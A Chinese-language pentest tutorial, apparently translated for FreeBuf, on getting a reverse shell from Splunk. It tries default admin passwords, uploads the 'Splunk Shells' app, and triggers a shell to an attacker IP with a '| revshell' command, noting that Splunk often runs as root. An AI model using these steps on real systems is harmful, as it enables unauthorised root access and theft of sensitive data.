在Splunk上安裝自定義應用反彈Shell的方法
前言
每次測試時我都會碰到Splunk。Splunk是一個用於搜索,分析和可視化數據的軟體平台。通常,Splunk中都會包含著各種數據,其中一些可能是較為敏感的數據。因此,對於滲透測試人員而言它的價值不言而喻。
想要獲得對Splunk的訪問許可權,可以通過猜密碼或重用之前獲取到的密碼嘗試登錄。曾經,我有過使用「
admin
:admin
」或「admin
:changeme
」登錄進入管理控制台的情況。
Splunk app
有一個技巧我相信很多人都不知道,就是使用Splunk app來執行python代碼。TBG Security團隊開發了一款可用於滲透測試的Splunk app。該應用早在2017年就已經推出。儘管如此,我覺得還是很少有人知道這個工具,我覺得它應該受到更多人的關注。
工具的使用非常簡單。首先,你只需從Splunk Shells GitHub頁面下載其最新版本。
登錄Splunk管理控制台後,依次單擊「App」欄和「Manage Apps」。
進入Apps面板後,單擊「Install app from file」。
單擊browse按鈕並上傳tar.gz文件。
應用成功上傳後,必須重啟Splunk。重啟後登錄Splunk,並返回到「Apps」界面。單擊permissions,當你看到「Sharing」選項時,單擊「All Apps」單選按鈕。
安裝app後,最後要做的就是獲取shell。這裡會有一些選項,我選擇的是通過Metasploit創建的標準反向shell。
MSF handler(或netcat listener)啟動並運行後,鍵入以下命令觸發app:
| revshell SHELLTYPE ATTACKERIP ATTACKERPORT
這將立即執行app,並獲取到一個反向shell。
以上測試是在Splunk 7.0上進行的,一切都非常的順利!Splunk通常以root身份運行,這為攻擊者提供了枚舉主機其他信息的機會,而不僅僅是局限在資料庫範圍。
*參考來源:n00py,FB小編secist編譯,轉載請註明來自FreeBuf.COM
※安全沒有邊界 | ISC 2018互聯網安全大會Day 3報道
※再談Wannacry,安全狗CEO陳奮道出網路安全新時代三大特徵
TAG:FreeBuf |